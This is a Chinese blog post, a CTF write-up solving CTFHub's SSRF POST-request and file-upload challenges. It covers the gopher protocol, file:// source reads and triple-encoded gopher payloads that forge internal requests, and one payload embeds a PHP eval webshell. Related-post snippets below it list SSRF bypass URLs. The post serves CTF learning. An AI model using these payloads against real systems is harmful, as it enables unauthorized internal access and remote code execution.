CTFHub技能树笔记之SSRF:POST请求、文件上传

已于 2022-04-08 23:08:36 修改
阅读量8k 收藏 22
点赞数 11
分类专栏: CTF SSRF 文章标签: web安全
于 2022-04-03 13:43:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123934857
版权
CTF 同时被 2 个专栏收录
16 篇文章 6 订阅
订阅专栏
SSRF
2 篇文章 0 订阅
订阅专栏

知识点:

1.什么是gopher协议

1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。
2.它只支持文本,不支持图像
3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。

2.gopher使用结构

gopher://127.0.0.1:80/_{TCP/IP数据流}       #_不能省

3.注意事项

1.默认端口为70

2.如果发起post请求,回车换行需要使用%0d%0a,如果多个参数,参数之间的&也需要进行URL编码

一、POST请求

题目有提示需用302跳转,以php的curl实现

使用dirsearch发现有以下界面,都访问看一下

python dirsearch.py -u http://challenge-c81b1dbf4106f429.sandbox.ctfhub.com:10800/?url=127.0.0.1

 只有flag.php有东西

 

我们尝试用file://读取文件,得到如下代码:

index.php

?url=file:///var/www/html/index.php
<?php

error_reporting(0);

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();                               //初始化一次curl对话,ch返回curl句柄
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']); //curlopt_url需要获取的 URL 地址
curl_setopt($ch, CURLOPT_HEADER, 0);             //启用时会将头文件的信息作为数据流输出。
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);     // 位掩码, 1 (301 永久重定向)
curl_exec($ch);
curl_close($ch);

 flag.php

?url=file:///var/www/html/flag.php
<?php

error_reporting(0);

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;                                      #当post传值为key时使出flag
    exit;
}
?>

<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>

解题思路:

我们知道只要往flag.php传key值就可以得到flag,而index.php可以利用curl传url,那么我们可以用gopher协议在index.php中构造post请求包往flag.php传key值,以此获取flag

POST包必须包含的四个参数:Content-Type,Content-Length,host,post

POST包如下:

POST /flag.php HTTP/1.1

Host: 127.0.0.1:80

Content-Type: application/x-www-form-urlencoded

Content-Length: 36                //长度为key的长度

key=0bd5e192bb3c5e0f3df6b8ddf4252d9c

gopher的数据需要用url编码三次之后再发送,且第一次编码后%0A需全部替换成%0D%0A,现在进行编码

三次编码后成这样了

完整payloads如下,前面都一样的,主要是key值每个人都不一样:

?url=http://127.0.0.1:80/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application/x-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D0bd5e192bb3c5e0f3df6b8ddf4252d9c

 最后使用burp发包

 艰难拿到flag

二、上传文件

1.题目已经提示说需要上传一个文件到flag.php

2.访问并且查看源代码,得到以下代码

?url=file:///var/www/html/flag.php

<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

Upload Webshell

<form action="/flag.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
</form>

3.意思是需要在本地上传且文件不能为空,而且这里缺了一个提交按钮,我们直接给他加上

 4.发现index.php还是存在的,而且代码和之前一样没变

5.那我们可以继续使用POST请求的方法向flag.php传递参数了,以下过程和POST请求一样,这里就单放图,不细说了

 

 

最后放上三次编码后的POST包,供大家参考

 POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520challenge-18dcec6a7d5dd0bc.sandbox.ctfhub.com%25253A10800%25250D%25250AUser-Agent%25253A%252520Mozilla/5.0%252520%252528Windows%252520NT%25252010.0%25253B%252520Win64%25253B%252520x64%25253B%252520rv%25253A98.0%252529%252520Gecko/20100101%252520Firefox/98.0%25250D%25250AAccept%25253A%252520text/html%25252Capplication/xhtml%25252Bxml%25252Capplication/xml%25253Bq%25253D0.9%25252Cimage/avif%25252Cimage/webp%25252C%25252A/%25252A%25253Bq%25253D0.8%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.8%25252Czh-TW%25253Bq%25253D0.7%25252Czh-HK%25253Bq%25253D0.5%25252Cen-US%25253Bq%25253D0.3%25252Cen%25253Bq%25253D0.2%25250D%25250AAccept-Encoding%25253A%252520gzip%25252C%252520deflate%25250D%25250AContent-Type%25253A%252520multipart/form-data%25253B%252520boundary%25253D---------------------------224081668421857974283262262083%25250D%25250AContent-Length%25253A%252520384%25250D%25250AOrigin%25253A%252520http%25253A//challenge-18dcec6a7d5dd0bc.sandbox.ctfhub.com%25253A10800%25250D%25250AConnection%25253A%252520close%25250D%25250AReferer%25253A%252520http%25253A//challenge-18dcec6a7d5dd0bc.sandbox.ctfhub.com%25253A10800/%25253Furl%25253D127.0.0.1/flag.php%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250A%25250D%25250A-----------------------------224081668421857974283262262083%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522123.txt%252522%25250D%25250AContent-Type%25253A%252520text/plain%25250D%25250A%25250D%25250A%25253C%25253Fphp%25250D%25250A%252520%252520%252520%252520%252540eval%252528%252524_REQUEST%25255B%252522shell%252522%25255D%252529%25253B%25250D%25250A%25253F%25253E%25250D%25250A-----------------------------224081668421857974283262262083%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525E9%25258E%2525BB%2525E6%252584%2525AA%2525E6%2525B0%2525A6%2525E9%25258F%25258C%2525E3%252583%2525A8%2525EE%252587%252597%25250D%25250A-----------------------------224081668421857974283262262083--

参考文章:

https://www.cnblogs.com/beidaxmf/p/13935298.html

https://blog.csdn.net/xiaoka__/article/details/121225099

https://www.cnblogs.com/bonelee/p/15194031.html

weixin_48799157
关注
  • 11
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3858
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 2807
SSRF相关题目实战
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1393
ctfhub ssrf post小记
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(一)(超详细总结)
最新发布
xt350488的博客
06-18 487
即服务器端请求伪造(Server-Side Request Forgery),是一种网络攻击技术,攻击者利用服务器上的应用程序向任意服务器发起请求或者操作,这些请求可能包括但不限于文件读取、命令执行、端口扫描等。在向服务器发送请求时,首先浏览器会进行一次URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次解码。码中的换行符,在URL的二次编码中不需要,否则会导致curl执行错误,导致我们拿不到正确的结果。替换完成之后,再次进行url编码,这里的url就是源码中的curl要执行的。
ctf get post 传参 HackBar
热门推荐
weixin_44614983的博客
01-31 3万+
get和post是http协议的两种基本请求方式 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 https://www.w3school.com.cn/tags/html_ref_httpmethods.asp 知乎上这篇更详细,关于get和post的区别 https://www.zhihu.com/question/28586791 web题中会遇到,比如...
初识CTF Day4 CTFHUBSSRF
suxinAL的博客
10-02 2142
前言 这一次是对ssrf的探索,ctfhub技能树web就快结束了,期待淦进阶 正文 SSRF 内网访问 题目告诉访问127就直接访问下试试,但是没想到这么简单 ?url=127.0.0.1/flag.php 伪协议读取文件 题目提示:尝试去读取一下Web目录下的flag.php吧 可以联想到web目录一般是存放在 var/www/html/ 里面 所以payload如下 ?url=file:///var/www/html/flag.php 进入该页面,查看页面源代码得到flag 端口扫描 题目提示:来来
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 2694
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
SSRF:针对关键业务应用的新威胁.pdf
08-07
企业应用程序 定义 典型企业环境 企业威胁和防御 SSRF 发展历程 类型 XXE隧道 使用SSRF攻击SAP 旧攻击的新活力 绕过安全限制 利用其他服务 结论
mars-ssrf:SSRFDedektörü
03-04
火星 SSRFDedektörü
SSRF_Vulnerable_Lab:本实验包含易受服务器端请求伪造攻击的示例代码
05-12
服务器端请求伪造(SSRF)易受攻击的实验室该存储库包含容易受到服务器端请求伪造(SSRF)攻击PHP代码。 我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的...
CTFHUB技能树-SSRF【持续更新】
qq_33295410的博客
09-16 7013
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,发现了flag.php 3
CTFHUB SSRF 【全】
Jay17的博客
04-17 1321
CTFHUB SSRF 题解 【全】
CTFHub-http协议-请求方式
yuqie的博客
03-31 235
CTFHub-http协议-请求方式
CTFHub技能树 Web-SSRF 上传文件
Senimo
07-04 1776
CTFHub技能树 Web-SSRF 上传文件 hint:这次需要上传一个文件到flag.php了,祝你好运 启动环境,依然为空白页面,查看URL: http://challenge-30455822aa791779.sandbox.ctfhub.com:10800/?url=_ 其通过 GET 方式传递了参数url,依照之前题目,尝试访问?url=127.0.0.1/flag.php: 提示需要上传 Webshell,只有选择文件功能,并没有提交按钮。 使用file协议读取flag.php的源码: ?
CTF-入门九
realstarstarli的博客
07-19 1192
CTF-入门九 这里继续bugku web的题解记录. 秋名山老司机 拿到这道题,告诉你们在两秒之内提交答案,手动肯定是不行的。 两秒内刷新是这样的页面,这里也可以知道是post方法传值 这里给出脚本,网上的脚本大同小异,这里按照惯例优化了一下代码并给出完整的代码注释 import requests from bs4 import BeautifulSoup #获取网页内容,并且提取<div>内容 ''' 通过我们对于题目的源代码的分析可知,在两秒内刷新页面会得到不一样的结果 这里其实是会话
CTFHUB--技能树--SSRF全解(上篇)
errorr0
05-11 2178
SSRF技能树
CTFHub-SSRF部分(已完结)
feng的博客
09-14 1万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
CTFHub技能树 Web-SSRF DNS重绑定 Bypass
Senimo
07-05 1839
CTFHub技能树 Web-SSRF DNS重绑定 Bypass hint:关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助 启动环境,打开题目为空白,查看URL: http://challenge-cafd9f03daa84720.sandbox.ctfhub.com:10800/?url=_ 与之前一样的形式,查看?url=127.0.0.1/flag.php: 提示不允许企业内部IP访问,尝试使用file协议读取源码:?url=file:///var/www/html/index.
CTFHUB SSRF文件上传
07-28
根据提供的引用内容,CTFHUB SSRF文件上传是指通过SSRF漏洞实现对目标服务器进行文件上传的攻击。在文件上传过程中,攻击者可以构造恶意请求,将文件上传到目标服务器上。具体的攻击方法可以使用常见的绕过技巧,如利用特殊字符、绕过短网址、利用特殊编码等。\[3\]同时,攻击者还可以通过修改请求头中的Content-Length字段来伪造文件大小,绕过服务器的文件上传限制。\[1\]\[2\]需要注意的是,CTFHUB SSRF文件上传是一种安全漏洞攻击,严禁在未授权的情况下进行此类行为,违法者将承担法律责任。 #### 引用[.reference_title] - *1* *2* *3* [CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)](https://blog.csdn.net/qq_31710331/article/details/119765578)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值